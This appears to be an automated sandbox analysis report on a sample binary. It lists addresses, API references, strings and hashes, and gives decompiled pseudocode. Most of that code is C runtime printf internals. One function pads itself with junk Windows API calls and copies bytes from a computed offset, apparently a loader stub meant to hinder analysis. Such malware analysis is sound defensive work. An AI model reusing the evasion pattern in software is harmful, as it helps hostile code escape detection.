0x004223f9
0x004223fa
0x004223fd
0x004223fe
0x00422401
0x00422402
0x00422409
0x0042240a
0x0042240d
0x0042240e
0x00422411
0x00422412
0x00422418
0x00422419
0x00422427
0x00422429
0x0042242f
0x0042242f
0x00422435
0x00422437
0x0042243b
0x0042243d
0x00422445
0x00422446
0x00422449
0x0042244a
0x00422458
0x0042245a
0x0042245a
0x0042243b
0x0042245d
0x00422464
0x00422467
0x0042246c
0x0042246c
0x00422472
0x00422474
0x0042247c
0x0042247d
0x00422480
0x00422481
0x00422490
0x00422492
0x00422492
0x00422472
0x00422495
0x00422498
0x0042249b
0x0042249e
0x004224a3
0x004224a9
0x004224ac
0x004224af
0x004224af
0x004224b2
0x004224b2
0x004224b5
0x004224c1
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004227d2
0x00422363
0x00422363
0x0042236a
0x0042236d
0x00000000
0x00000000
0x0042236f
0x0042236f
0x00000000
0x0042236f
0x00422354
0x00422354
0x00000000
0x00000000
0x00421fe1
0x00421fe4
0x00421fe4
0x00421fea
0x00422045
0x0042204d
0x00422054
0x0042205a
0x00422060
0x00421fec
0x00421fec
0x00421ff6
0x00421ffa
0x00422002
0x00422009
0x00422016
0x0042201d
0x00422029
0x0042202f
0x00422036
0x00422038
0x00422038
0x0042203f
0x00422067
0x0042206d
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004224c9
0x004224cc
0x004224cf
0x004224d2
0x00000000
0x00000000
0x00000000
0x00000000
0x0042252c
0x0042252c
0x00422536
0x00422536
0x0042253c
0x0042253e
0x00422541
0x00422541
0x00422547
0x00422547
0x00000000
0x00000000
0x004224e4
0x004224e4
0x00000000
0x00000000
0x00422121
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x0042215a
0x00422160
0x004221c7
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f4
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422201
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x00422216
0x0042221c
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422195
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00000000
0x004224db
0x004224db
0x00000000
0x00000000
0x004224f7
0x004224f7
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00422668
0x00422668
0x0042266e
0x00422674
0x0042267a
0x00000000
0x00422628
0x00422628
0x00422628
0x0042262f
0x00000000
0x00000000
0x00422631
0x00422631
0x0042263c
0x00422642
0x00422644
0x0042264a
0x0042264d
0x0042264f
0x00422655
0x0042265e
0x00422663
0x00422680
0x00422683
0x00422683
0x00422688
0x0042268d
0x0042268d
0x00422693
0x00422695
0x0042269b
0x004226a1
0x004226a1
0x004226aa
0x004226aa
0x00422693
0x004226b0
0x004226b4
0x004226c2
0x004226c5
0x004226c8
0x004226cf
0x004226d1
0x004226d1
0x004226b6
0x004226b6
0x004226b6
0x004226de
0x004226de
0x004226e4
0x004226e6
0x004226e6
0x004226ed
0x004226f0
0x004226f3
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00422703
0x00422709
0x00422709
0x0042270f
0x00000000
0x00000000
0x00422711
0x00422711
0x00422714
0x00422717
0x0042271e
0x00422725
0x0042272d
0x00422733
0x00422736
0x00422739
0x00422740
0x0042274c
0x00422752
0x00422758
0x0042275f
0x00422761
0x00422767
0x00422767
0x0042276d
0x0042276d
0x00422773
0x00422776
0x0042277c
0x00422781
0x00422784
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00000000
0x00422701
0x004226f3
0x00422633
0x00422633
0x0042263a
0x00000000
0x00000000
0x00000000
0x0042263a
0x00000000
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x00000000
0x00421d91
0x00421d94
0x00421d97
0x00000000
0x00000000
0x00421d9c
0x00421d9f
0x00421da4
0x00000000
0x00000000
0x00421d86
0x00421d86
0x00421d89
0x00421d8c
0x00000000
0x00000000
0x00421d7b
0x00421d7e
0x00421d81
0x00000000
0x00000000
0x00421da9
0x00421da9
0x00421dac
0x00421dac
0x00421daf
0x00000000
0x00000000
0x00421db2
0x00000000
0x00000000
0x00421b4e
0x00421b50
0x00421b5e
0x00421b52
0x00421b52
0x00421b52
0x00421b68
0x00421b6e
0x00421b7b
0x00421b7d
0x00421b82
0x00421b84
0x00421b89
0x00421b8e
0x00421b90
0x00421b95
0x00421b9b
0x00421b9d
0x00421b9d
0x00421b9b
0x00421b9e
0x00421ba5
0x00000000
0x00421ba7
0x00421bac
0x00421bc8
0x00421bd0
0x00421bdd
0x00421be2
0x00000000
0x00421be2
0x00421ba5
0x00421b48
0x004229dd
0x004229e4
0x004229fb
0x004229fb
0x00422a05
0x00422a05
0x00422a0b
0x00422a18
0x00422a1a
0x00422a1f
0x00422a21
0x00422a26
0x00422a2b
0x00422a2d
0x00422a32
0x00422a38
0x00422a3a
0x00422a3a
0x00422a38
0x00422a42
0x00422a8d
0x00422a96
0x00422a9b
0x00422a44
0x00422a49
0x00422a65
0x00422a6d
0x00422a7a
0x00422a7f
0x00422a7f
0x00000000
0x00422a42
0x004229e6
0x004229ed
0x00000000
0x00000000
0x004229ef
0x004229ef
0x00000000
0x004229ef
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00422aa1
0x00422aae
0x00422aae
0x004222ea
0x004222f0
0x00422310
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x00000000
0x00422312

APIs

_get_int_arg.LIBCMTD ref: 0042222B
__get_printf_count_output.LIBCMTD ref: 00422239
__invalid_parameter.LIBCMTD ref: 004222C0
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004222D5
_write_multi_char.LIBCMTD ref: 0042284E
_write_string.LIBCMTD ref: 00422869
_write_multi_char.LIBCMTD ref: 00422895
_wctomb_s.LIBCMTD ref: 00422912

Strings

("Incorrect format specifier", 0), xrefs: 00421B7D, 00421BC3
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c, xrefs: 00421B89, 00421BB9, 00422281, 004222B1
_output_s_l, xrefs: 00421BBE, 004222B6
-, xrefs: 004227EE
("'n' format specifier disabled", 0), xrefs: 00422275, 004222BB

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
API String ID: 2357813345-2363074782
Opcode ID: 3cf7f06d2b7da64164eda07a31469a750aa1bc6f40da81187d583ffbab83941d
Instruction ID: a7c1c9a15f125d9c38768179346bce3e4025362fe9f3d82d88195675478f5baa
Opcode Fuzzy Hash: 3cf7f06d2b7da64164eda07a31469a750aa1bc6f40da81187d583ffbab83941d
Instruction Fuzzy Hash: 50A19170E04238ABDB24DB54DD49BEEB7B0AB48304F5081DAE4197A291D7B85EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409F4C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 88
timepipethreadCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409F4C(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _v28;
				struct _COMMTIMEOUTS _v32;
				struct _DCB _v60;
				char _v1084;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t39;

				if( *0x4e3424 == 0x37) {
					_v32.ReadIntervalTimeout = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					BuildCommDCBAndTimeoutsW(L"cicazihiyadodedeyuxibotihogo",  &_v60,  &_v32);
					GetDriveTypeW(0);
					CallNamedPipeA(0, 0, 0, 0, 0, 0, 0);
					GetThreadPriority(0);
					GlobalDeleteAtom(0);
					AddAtomA(0);
					LoadResource(0, 0);
					WriteConsoleInputW(0, 0, 0,  &_v12);
					GetWriteWatch(0, 0, 0, 0, 0, 0);
					__imp__FindNextVolumeMountPointA(0,  &_v1084, 0, _t39);
					__imp__DeleteTimerQueueTimer(0, 0, 0);
					LocalFree(0);
					WritePrivateProfileStructA(0, 0, 0, 0, 0);
					GetCommConfig(0, 0, 0);
				}
				_v8 = 0;
				_t16 =  *0x4e3428; // 0x426832
				_v8 = _v8 + _t16;
				_v8 = _v8 + 0x38d6;
				_t18 = _a4;
				 *((char*)( *0x4c6880 + _t18)) =  *((intOrPtr*)(_v8 + _t18));
				return _t18;
			}

0x00409f5f
0x00409f68
0x00409f6e
0x00409f6f
0x00409f70
0x00409f71
0x00409f7f
0x00409f86
0x00409f93
0x00409f9a
0x00409fa1
0x00409fa8
0x00409fb0
0x00409fbd
0x00409fc9
0x00409fd8
0x00409fe1
0x00409fe8
0x00409ff3
0x00409ffc
0x0040a002
0x0040a003
0x0040a006
0x0040a00b
0x0040a013
0x0040a016
0x0040a025
0x0040a02a

APIs

BuildCommDCBAndTimeoutsW.KERNEL32 ref: 00409F7F
GetDriveTypeW.KERNEL32(00000000), ref: 00409F86
CallNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409F93
GetThreadPriority.KERNEL32(00000000), ref: 00409F9A
GlobalDeleteAtom.KERNEL32 ref: 00409FA1
AddAtomA.KERNEL32 ref: 00409FA8
LoadResource.KERNEL32(00000000,00000000), ref: 00409FB0
WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00409FBD
GetWriteWatch.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409FC9
FindNextVolumeMountPointA.KERNEL32(00000000,?,00000000), ref: 00409FD8
DeleteTimerQueueTimer.KERNEL32(00000000,00000000,00000000), ref: 00409FE1
LocalFree.KERNEL32(00000000), ref: 00409FE8
WritePrivateProfileStructA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409FF3
GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 00409FFC

Strings

2hB, xrefs: 0040A006
cicazihiyadodedeyuxibotihogo, xrefs: 00409F7A

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Write$AtomCommDeleteTimer$BuildCallConfigConsoleDriveFindFreeGlobalInputLoadLocalMountNamedNextPipePointPriorityPrivateProfileQueueResourceStructThreadTimeoutsTypeVolumeWatch
String ID: 2hB$cicazihiyadodedeyuxibotihogo
API String ID: 3357634081-1008404809
Opcode ID: f1c391ba09a2f30f28388959de776696bf324bc5a5a1242cb28a2046ef93cda1
Instruction ID: b4fd3a30547ee8ee9b9f8a28ae90385c4615fc7664a99b665e30704b39403995
Opcode Fuzzy Hash: f1c391ba09a2f30f28388959de776696bf324bc5a5a1242cb28a2046ef93cda1
Instruction Fuzzy Hash: 9E21BC72802564FBD712ABA5EE08CDF7BBCEF0A3517004065F645E2520D7345685CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0042359A Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042359A(void* __eflags) {
				signed int* _t482;
				signed int _t486;
				void* _t491;
				signed int _t493;
				void* _t501;
				void* _t519;
				signed int _t523;
				void* _t534;
				signed int _t576;
				void* _t598;
				void* _t599;
				signed int _t600;
				void* _t602;
				void* _t603;

				L0:
				while(1) {
					L0:
					_t482 = E0041F270(_t600 + 0x14);
					_t603 = _t602 + 4;
					 *(_t600 - 0x484) = _t482;
					if(E00424120() != 0) {
						goto L115;
					}
					L106:
					__ecx = 0;
					if(0 == 0) {
						 *(__ebp - 0x4f4) = 0;
					} else {
						 *(__ebp - 0x4f4) = 1;
					}
					__edx =  *(__ebp - 0x4f4);
					 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
					if( *(__ebp - 0x488) == 0) {
						_push(L"(\"\'n\' format specifier disabled\", 0)");
						_push(0);
						_push(0x695);
						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
						_push(2);
						__eax = L0040C820();
						__esp = __esp + 0x14;
						if(__eax == 1) {
							asm("int3");
						}
					}
					if( *(__ebp - 0x488) != 0) {
						L114:
						while(1) {
							L187:
							if( *(_t600 - 0x28) != 0) {
								goto L212;
							}
							L188:
							if(( *(_t600 - 0x10) & 0x00000040) != 0) {
								if(( *(_t600 - 0x10) & 0x00000100) == 0) {
									if(( *(_t600 - 0x10) & 0x00000001) == 0) {
										if(( *(_t600 - 0x10) & 0x00000002) != 0) {
											 *((short*)(_t600 - 0x14)) = 0x20;
											 *(_t600 - 0x1c) = 1;
										}
									} else {
										 *((short*)(_t600 - 0x14)) = 0x2b;
										 *(_t600 - 0x1c) = 1;
									}
								} else {
									 *((short*)(_t600 - 0x14)) = 0x2d;
									 *(_t600 - 0x1c) = 1;
								}
							}
							 *((intOrPtr*)(_t600 - 0x4ac)) =  *((intOrPtr*)(_t600 - 0x18)) -  *(_t600 - 0x24) -  *(_t600 - 0x1c);
							if(( *(_t600 - 0x10) & 0x0000000c) == 0) {
								E00423F90(0x20,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
								_t603 = _t603 + 0x10;
							}
							E00423FD0( *(_t600 - 0x1c), _t600 - 0x14,  *(_t600 - 0x1c),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
							_t603 = _t603 + 0x10;
							if(( *(_t600 - 0x10) & 0x00000008) != 0) {
								if(( *(_t600 - 0x10) & 0x00000004) == 0) {
									E00423F90(0x30,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
									_t603 = _t603 + 0x10;
								}
							}
							if( *(_t600 - 0xc) != 0) {
								L208:
								E00423FD0( *(_t600 - 0x24),  *((intOrPtr*)(_t600 - 4)),  *(_t600 - 0x24),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
								_t603 = _t603 + 0x10;
								goto L209;
							} else {
								L201:
								if( *(_t600 - 0x24) <= 0) {
									goto L208;
								}
								L202:
								 *((intOrPtr*)(_t600 - 0x4b0)) =  *((intOrPtr*)(_t600 - 4));
								 *(_t600 - 0x4b4) =  *(_t600 - 0x24);
								while(1) {
									L203:
									 *(_t600 - 0x4b4) =  *(_t600 - 0x4b4) - 1;
									if( *(_t600 - 0x4b4) <= 0) {
										break;
									}
									L204:
									_t519 = E004103A0(_t600 - 0x40);
									_t523 = E00420B60(_t600 - 0x458,  *((intOrPtr*)(_t600 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t600 - 0x40))) + 0xac)), _t519);
									_t603 = _t603 + 0x10;
									 *(_t600 - 0x4b8) = _t523;
									if( *(_t600 - 0x4b8) > 0) {
										L206:
										E00423F30( *(_t600 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
										_t603 = _t603 + 0xc;
										 *((intOrPtr*)(_t600 - 0x4b0)) =  *((intOrPtr*)(_t600 - 0x4b0)) +  *(_t600 - 0x4b8);
										continue;
									}
									L205:
									 *(_t600 - 0x44c) = 0xffffffff;
									break;
								}
								L207:
								L209:
								if( *(_t600 - 0x44c) >= 0) {
									if(( *(_t600 - 0x10) & 0x00000004) != 0) {
										E00423F90(0x20,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
										_t603 = _t603 + 0x10;
									}
								}
							}
							L212:
							if( *(_t600 - 0x20) != 0) {
								L0040F230( *(_t600 - 0x20), 2);
								_t603 = _t603 + 8;
								 *(_t600 - 0x20) = 0;
							}
							while(1) {
								L214:
								 *(_t600 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t600 + 0xc))));
								_t538 =  *(_t600 - 0x454) & 0x0000ffff;
								 *((intOrPtr*)(_t600 + 0xc)) =  *((intOrPtr*)(_t600 + 0xc)) + 2;
								if(( *(_t600 - 0x454) & 0x0000ffff) == 0 ||  *(_t600 - 0x44c) < 0) {
									break;
								} else {
									if(( *(_t600 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t600 - 0x454) & 0x0000ffff) > 0x78) {
										 *(_t600 - 0x4d8) = 0;
									} else {
										 *(_t600 - 0x4d8) =  *(( *(_t600 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
									}
								}
								L7:
								 *(_t600 - 0x450) =  *(_t600 - 0x4d8);
								_t576 =  *(_t600 - 0x450) * 9;
								_t493 =  *(_t600 - 0x45c);
								_t546 = ( *(_t576 + _t493 + 0x4081a0) & 0x000000ff) >> 4;
								 *(_t600 - 0x45c) = ( *(_t576 + _t493 + 0x4081a0) & 0x000000ff) >> 4;
								if( *(_t600 - 0x45c) != 8) {
									L16:
									 *(_t600 - 0x4e0) =  *(_t600 - 0x45c);
									if( *(_t600 - 0x4e0) > 7) {
										continue;
									}
									L17:
									switch( *((intOrPtr*)( *(_t600 - 0x4e0) * 4 +  &M00423E24))) {
										case 0:
											L18:
											 *(_t600 - 0xc) = 1;
											E00423F30( *(_t600 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
											_t603 = _t603 + 0xc;
											goto L214;
										case 1:
											L19:
											 *(__ebp - 0x2c) = 0;
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x28) = __ecx;
											__edx =  *(__ebp - 0x28);
											 *(__ebp - 0x18) =  *(__ebp - 0x28);
											__eax =  *(__ebp - 0x18);
											 *(__ebp - 0x1c) =  *(__ebp - 0x18);
											 *(__ebp - 0x10) = 0;
											 *(__ebp - 0x30) = 0xffffffff;
											 *(__ebp - 0xc) = 0;
											goto L214;
										case 2:
											L20:
											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
											 *(__ebp - 0x4e4) = __ecx;
											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
											__eflags =  *(__ebp - 0x4e4) - 0x10;
											if( *(__ebp - 0x4e4) > 0x10) {
												goto L27;
											}
											L21:
											_t58 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
											__ecx =  *_t58 & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
												case 0:
													goto L24;
												case 1:
													goto L25;
												case 2:
													goto L23;
												case 3:
													goto L22;
												case 4:
													goto L26;
												case 5:
													goto L27;
											}
										case 3:
											L28:
											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
												__edx =  *(__ebp - 0x18);
												__edx =  *(__ebp - 0x18) * 0xa;
												__eflags = __edx;
												_t82 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
												__ecx = __edx + _t82;
												 *(__ebp - 0x18) = __ecx;
											} else {
												__edx = __ebp + 0x14;
												 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x18);
												if( *(__ebp - 0x18) < 0) {
													__eax =  *(__ebp - 0x10);
													__eax =  *(__ebp - 0x10) | 0x00000004;
													__eflags = __eax;
													 *(__ebp - 0x10) = __eax;
													__ecx =  *(__ebp - 0x18);
													__ecx =  ~( *(__ebp - 0x18));
													 *(__ebp - 0x18) = __ecx;
												}
											}
											L33:
											goto L214;
										case 4:
											L34:
											 *(__ebp - 0x30) = 0;
											goto L214;
										case 5:
											L35:
											__edx =  *(__ebp - 0x454) & 0x0000ffff;
											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
												__ecx =  *(__ebp - 0x30);
												__ecx =  *(__ebp - 0x30) * 0xa;
												__eflags = __ecx;
												_t93 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
												__eax = __ecx + _t93;
												 *(__ebp - 0x30) = __ecx + _t93;
											} else {
												__eax = __ebp + 0x14;
												 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x30);
												if( *(__ebp - 0x30) < 0) {
													 *(__ebp - 0x30) = 0xffffffff;
												}
											}
											goto L214;
										case 6:
											L41:
											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
											 *(__ebp - 0x4e8) = __ecx;
											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
											__eflags =  *(__ebp - 0x4e8) - 0x2e;
											if( *(__ebp - 0x4e8) > 0x2e) {
												L64:
												goto L214;
											}
											L42:
											_t101 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
											__ecx =  *_t101 & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
												case 0:
													L47:
													__ecx =  *(__ebp + 0xc);
													__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
														L50:
														__ecx =  *(__ebp + 0xc);
														__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
														__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
														if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
															L53:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx & 0x0000ffff;
															__eflags = ( *__ecx & 0x0000ffff) - 0x64;
															if(( *__ecx & 0x0000ffff) == 0x64) {
																L59:
																L61:
																goto L64;
															}
															L54:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = __ecx - 0x69;
															if(__ecx == 0x69) {
																goto L59;
															}
															L55:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
															if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																goto L59;
															}
															L56:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx & 0x0000ffff;
															__eflags = ( *__ecx & 0x0000ffff) - 0x75;
															if(( *__ecx & 0x0000ffff) == 0x75) {
																goto L59;
															}
															L57:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = __ecx - 0x78;
															if(__ecx == 0x78) {
																goto L59;
															}
															L58:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
															if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																 *(__ebp - 0x45c) = 0;
																goto L18;
															}
															goto L59;
														}
														L51:
														__eax =  *(__ebp + 0xc);
														__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
														__eflags = __ecx - 0x32;
														if(__ecx != 0x32) {
															goto L53;
														} else {
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
															goto L61;
														}
													}
													L48:
													__eax =  *(__ebp + 0xc);
													__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
													__eflags = __ecx - 0x34;
													if(__ecx != 0x34) {
														goto L50;
													} else {
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
														goto L61;
													}
												case 1:
													L62:
													__ecx =  *(__ebp - 0x10);
													__ecx =  *(__ebp - 0x10) | 0x00000020;
													 *(__ebp - 0x10) = __ecx;
													goto L64;
												case 2:
													L43:
													__edx =  *(__ebp + 0xc);
													__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
														__eax =  *(__ebp - 0x10);
														__eax =  *(__ebp - 0x10) | 0x00000010;
														__eflags = __eax;
														 *(__ebp - 0x10) = __eax;
													} else {
														__ecx =  *(__ebp + 0xc);
														__ecx =  *(__ebp + 0xc) + 2;
														 *(__ebp + 0xc) = __ecx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
													}
													goto L64;
												case 3:
													L63:
													__edx =  *(__ebp - 0x10);
													__edx =  *(__ebp - 0x10) | 0x00000800;
													__eflags = __edx;
													 *(__ebp - 0x10) = __edx;
													goto L64;
												case 4:
													goto L64;
											}
										case 7:
											L65:
											__eax =  *(__ebp - 0x454) & 0x0000ffff;
											 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
											__ecx =  *(__ebp - 0x4ec);
											__ecx =  *(__ebp - 0x4ec) - 0x41;
											 *(__ebp - 0x4ec) = __ecx;
											__eflags =  *(__ebp - 0x4ec) - 0x37;
											if( *(__ebp - 0x4ec) > 0x37) {
												goto L187;
												do {
													do {
														while(1) {
															L187:
															if( *(_t600 - 0x28) != 0) {
																goto L212;
															}
															goto L188;
														}
														L183:
														__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
														 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
														__ecx =  *(__ebp - 4);
														__ecx =  *(__ebp - 4) + 1;
														 *(__ebp - 4) = __ecx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
														__eflags =  *(__ebp - 0x10) & 0x00000200;
													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
													__eflags =  *(__ebp - 0x24);
													if( *(__ebp - 0x24) == 0) {
														break;
													}
													L185:
													__eax =  *(__ebp - 4);
													__ecx =  *( *(__ebp - 4));
													__eflags = __ecx - 0x30;
												} while (__ecx == 0x30);
												L186:
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												__eax =  *(__ebp - 4);
												 *( *(__ebp - 4)) = 0x30;
												__ecx =  *(__ebp - 0x24);
